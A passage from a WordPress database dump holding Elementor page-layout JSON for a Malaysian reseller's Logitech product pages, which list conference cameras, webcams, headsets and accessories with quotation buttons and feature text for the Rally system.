control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5e9935e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"14b03e7\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-rally\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1a473ca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":20},\"elements\":[{\"id\":\"009aa7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-conference-cam.png\",\"id\":1316},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6572b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>MeetUp<\\/h4><p>All-in-One ConferenceCam with 120\\u00b0 field of view and integrated audio, perfect for small conference and huddle rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9ea3deb\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"ca314b4\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-meetup\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2042b97\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2e8e54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1b201c2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-connect.png\",\"id\":1318}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"17f6307\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>CONNECT<\\/h3><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ed3411\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"f0bb209\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-connect\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1a08e65\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93261d2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-bcc950.png\",\"id\":1319}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0e23f40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>BCC950<\\/h3><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5fe5fab\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"67ffddd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":20},\"elements\":[{\"id\":\"177327c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ptz-pro-2-camera.png\",\"id\":1321}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ff04afc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PTZ PRO 2<\\/h3><p>HD 1080p video camera with enhanced pan\\/tilt and zoom<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e3ff14a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"666088c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-ptz-pro-2\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a021238\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5be05f3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"aea13c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"790f00c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-camera-e1544499263206.png\",\"id\":1247}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"322d778\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Rally Camera<\\/h4><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5fe363c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"c6bed49\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-rally\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"3862603\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"8e81386\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"51d763e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7410c4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>VC ROOM SOLUTIONS<\\/h2><p>Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"75fc0cb\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"345e12f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b63babc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be0e6a0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-smartdock-flex.png\",\"id\":1397},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9005f6d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SMARTDOCK<\\/h3><p>Secure meeting room console designed for Skype Room Systems<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b9dedfe\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9b49863\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"433835b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ff5eeb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a4767f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>WEBCAMS<\\/h2><p>Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0f3d021\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5fe6e79\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b4e24a2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/briopictograms.png\",\"id\":1332}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9a3535d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>BRIO<\\/h3><p>4K Ultra HD webcam with RightLight\\u2122 3 with HDR<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"fba2ea6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c05d87c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12d5f47\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/c930e-webcam.png\",\"id\":1334}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91bee63\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech C930e<\\/h3><p>Business webcam with a wide field of view and HD digital zoom<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4e520f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c71a30b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f62006e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/c925e-webcam.png\",\"id\":1336}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a94baf9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech C925e<\\/h3><p>Affordable 1080p HD webcam with integrated privacy shade<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"086da3d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ae10c21\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"93d444d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5ab9b49\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"858059a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/b525-pdp-2017-refresh.png\",\"id\":1354}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca4407c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech B525<\\/h3><p>Ideal for on-the-go professionals with a compact, foldable, 360\\u00b0 swivel design<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"009af69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"fe5d066\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9072abf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6c257c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c2db587\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>HEADSETS<\\/h2><p>Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aea83c8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a1561a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5e39286\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ece341e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/h570e-headset.png\",\"id\":1364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e3497b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech H570e Headset<\\/h3><p>Comfortable, affordable, and built to last<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"785345f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b698d09\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"16f5dd5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c4a4a72\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6b09cb7\",\"elType\":\"widget\",\"settings\":{\"title\":\"VIDEO COLLABORATION ACCESSORIES\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f31cb09\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"12ed18d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"38d7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/smartdock-extender-box.png\",\"id\":1386}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9cbda85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SMARTDOCK EXTENDER BOX<\\/h3><p>Connectivity options for Logitech SmartDock<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f575023\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"08edb2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"85c2829\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-screen-share.png\",\"id\":1391}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f3f660b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech Screen Share<\\/h3><p>A fast, familiar, and affordable way to share content in the conference room and into online meetings.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"77dadd4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b20ef35\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3211191\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-expansion-microphones.png\",\"id\":1392}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2a65808\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP EXPANSION MICS<\\/h3><p>Add-on mics for larger groups<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6a71d0d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac7c83c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f6834a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"13a33a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-smartdock-flex.png\",\"id\":1397}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5b6e717\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech SmartDock Flex<\\/h3><p>Expansion Kit for Logitech SmartDock<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5014200\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"366eb59\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dc59d5f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-15m-extended-cable.png\",\"id\":1401}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e222e61\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP 15M EXTENDED CABLE<\\/h3><p>15 meter cable for video conferences in larger rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b6bbdef\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b7c0191\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8128e7a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-10m-extended-cable.png\",\"id\":1404}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a506052\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP 10M EXTENDED CABLE<\\/h3><p>10 meter cable, ideal for large conference rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"da882ae\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"509c931\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2438d41\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f231a38\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bc953c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-expansion-mics.png\",\"id\":1406}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"db20012\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>EXPANSION MIC FOR MEETUP<\\/h3><p>Add-on microphone for huddle room flexibility<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"33673e4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"cfcc955\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(5698,2970,'_elementor_version','0.4'),(5702,2971,'_wp_page_template','template-fullwidth.php'),(5703,2971,'_elementor_data','[{\"id\":\"008e84f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"21f0da0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"34477cd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>RALLY<\\/h3><p>Premium Ultra-HD ConferenceCam system with automatic camera control<\\/p><ul><li>RightSense\\u2122 technology automates a better user experience<\\/li><li>Modular audio for full coverage of medium to very large rooms<\\/li><li>Premium components and sleek industrial design<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5bb4207\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b5262b0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-system-b2b-pdp.png\",\"id\":1249},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9021bd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d99b4d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"21995c0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ALL TOGETHER NOW<\\/h3><p>Logitech Rally delivers studio-quality video, unmatched voice clarity, and RightSense\\u2122 automation for better meetings with video conferencing applications that work with USB devices, including Google Hangouts Meet, Microsoft Skype\\u00ae for Business, Microsoft Teams, and Zoom. With modular audio, thoughtful cable management and premium finishes, Rally integrates beautifully into medium and larger rooms.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a0aee94\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"218bc5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"434bad8\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0624977\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"cb4a385\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2d24280\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/uwx62jjxOnE\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"742163f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b70394f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>STUDIO-QUALITY VIDEO<\\/h3><p>With an Ultra-HD imaging system, Rally delivers brilliantly sharp video, outstanding color, and exceptional optical accuracy at resolutions up to 4K. Logitech RightLight\\u2122technology optimizes light balance to emphasize faces and render natural-looking skin tones, even in dim or backlit conditions.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bd1e4d0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"92a5761\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"c4d9848\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ADVANCED MODULAR AUDIO<\\/h3><p>Crystal-clear audio is essential for world-class video conferencing, and Rally excels in delivering sound that\\u0092s natural, crisp, and highly intelligible. Logitech RightSound\\u0099\\u2122 enhances voice clarity by suppressing background noise, auto-leveling voices, and focusing on active speakers. Exquisitely sensitive mic pods ensure that everyone in the meeting can be clearly heard while stand-alone speakers fill larger rooms with rich, life-like 